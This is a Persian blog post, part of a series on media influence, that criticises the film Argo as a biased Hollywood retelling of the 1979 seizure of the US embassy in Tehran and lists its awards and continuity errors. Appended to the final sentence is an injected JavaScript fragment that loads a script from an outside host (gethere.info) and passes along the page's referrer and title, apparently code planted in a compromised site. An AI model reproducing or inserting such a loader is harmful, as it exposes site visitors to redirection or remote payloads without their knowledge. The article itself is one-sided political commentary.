رسانه، علم غالب امروز – قسمت دهم

« به نام خدا »

دیرین گونه ها، داستان های واقعی که فقط یک بار اتفاق افتادند؛ مثل داستان حضرت نوح، یونس، موسی و …

Poster

فیلم Argo (آرگو)، محصول سال 2012، درباره تسخیر لانه جاسوسی 13 آبان در زمان انقلاب هست که جوان های ایرانی داخل سفارت آمریکا شده و آنجا را بدست می گیرند. در طی این عمل، چندین نفر (6 نفر – در فیلم) موفق به فرار شده و سپس آنها به دوسه تا سفارت میروند و قبولشون نمیکنند و درنهایت به سفارت کانادا رفته و با آمریکا ارتباط گرفته و CIA یک فردی به عنوان کسی که قراره اونها رو نجات بده میفرستن به ایران و تو فیلم خودش رو تو نقش یک کارگردان جلوه میده و اونهایی که فرار کردن مثلا میشوند بازیگرهای اون فیلم و تو این حین مقدمات فرار رو فراهم میکنند و در آخر فیلم هم آنها از طریق هواپیما، موفق به فرار می شوند.

 

اتفاق 13 آبان، یک داستان واقعی هست! اما …

به عنوان مثال، اگر یک اتفاقی بیفته و یک فردی بخواد اون رو برای کس دیگه ای تعریف کنه، چند حالت پیش میاد؛ اگه طرف آدم حسابی میشه، میره عین واقعیتی که اتفاق افتاده رو تعریف میکنه و حتی اگر جایی به نفعش نبود یا … اونارو سرپوشی نمیکنه و دقیق همه چیز رو کامل میگه. اما اگه یک آدم معمولی یا غیرحسابی باشه، میاد بالا و پایینش میکنه، هرکی رو که بخواد گنده میکنه و یا پایین می کشه، هرچی رو که به نفعش باشه خوب یا قهرمان و هرکی نباشه بد یا منفور نشون میده، و اکثر افرادی هم که اینها رو می شنوند فکر می کنند که واقعیت همین هست! مثلا بگیر شخصیت یکی رو خراب کن و به بقیه بگو، خب طبیعتا نظر مردم راجع به اون فرد عوض میشه!

03

کاری که رسانه و فیلم ها انجام میدهند، حالت دوم مثال فوق است! فیلم Argo که راجع به 13 آبان بود، مثال بارزی در تایید حرفمان است؛ واقعیتی که واقعا وجود دارد را مطابق میل خود عوض کرده و آن را در سرتاسر جهان عرضه می کند. فیلم American Sniper که پیش تر بررسی شد نیز چنین بود.

به عنوان مثال، شخصیت تونی مندز هم واقعی بود، درست مثل کریس کایل در فیلم تک تیر انداز، که یک آدمکش حرفه ای بود و در فیلم یک قهرمان نشان داده شد.

.

.

.

کلا فیلمی که اسکار بگیره، پرفروش میشه. این فیلم نامزد 7 تا اسکار شده و 3 تا رو برده. در جشنواره گلدن هم نامزد 5 تا بوده و 2 تا رو برده، در حالی که خود آمریکایی ها گفتند که این فیلم ضعیفی هست! ولی به خاطر اسکار گرفتن، فروشش بالا میره و سود میکنه. کلا اسکار اینجوری هست که فیلمی که اسکار بگیره همه مردم دنیا باید اون رو ببینند! حتی اگر فیلم ارزش هنری اصلا نداشته باشه!

یک نکته ای هم که وجود داره این هست که موقع اعلام جوایز، ویدیوکنفرانس گرفته شده و زن اومابا، میشل اوباما این رو اعلام میکنه (که میشه برداشت کرد که فیلم سیاسی هست!)

02

خود فیلم هم سوتی های بسیار زیادی داره که حتی یک کلیپ گاف آرگو ساخته شده که سوتی های فیلم رو بیان میکنه. مثلا ساعت تونی مندز که چند سالی نیست که ساخته شده در حالی که زمان فیلم قدیمی تر از این هاست، و یا اینکه در جایی موقع جدا شدن از فردی و ترک مکان، به جای خداحافظی، سلام میکنه و طرف مقابل هم با سلام جوابشو میده! انواع ماشین های مختلف که نشون داده میشه که پیکان جزوشون نیست! و …

صحنه هایی از فیلم که ایران رو نشون میده هم توی ترکیه فیلم برداری شده است.

 

 

در ادامه، به توضیح واقعیت اتفاق افتاده به همراه بررسی بخش هایی از فیلم می پردازیم…s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;